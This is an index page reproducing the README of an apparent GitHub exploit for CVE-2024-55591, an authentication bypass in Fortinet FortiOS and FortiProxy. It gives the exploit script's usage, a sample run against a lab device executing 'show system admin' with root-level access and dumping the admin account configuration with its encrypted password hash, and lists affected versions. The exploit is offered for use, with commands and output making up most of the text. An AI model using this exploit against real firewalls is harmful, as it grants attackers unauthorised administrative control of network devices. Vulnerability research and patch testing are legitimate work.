An open API service indexing awesome lists of open source software.

https://github.com/sysirq/fortios-auth-bypass-exploit-cve-2024-55591


https://github.com/sysirq/fortios-auth-bypass-exploit-cve-2024-55591

Last synced: 2 months ago
JSON representation

Awesome Lists containing this project

README

        

# CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Exploit

# Description

Use this exp,you can bypass authentication and run cmd

# USEAGE

```
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t
```

# Demo

![image-20250122220404985](images/image-20250122220404985.png)

![image-20250122220502121](images/image-20250122220502121.png)

![image-20250122220502121](images/exp_demo.gif)

# output

```
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" "" \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM #
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" "" \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM #
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
edit "admin"
set accprofile "super_admin"
set vdom "root"
set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
next
end
```

# Affected Versions

- FortiOS 7.0.0 through 7.0.16
- FortiProxy 7.0.0 through 7.0.19
- FortiProxy 7.2.0 through 7.2.12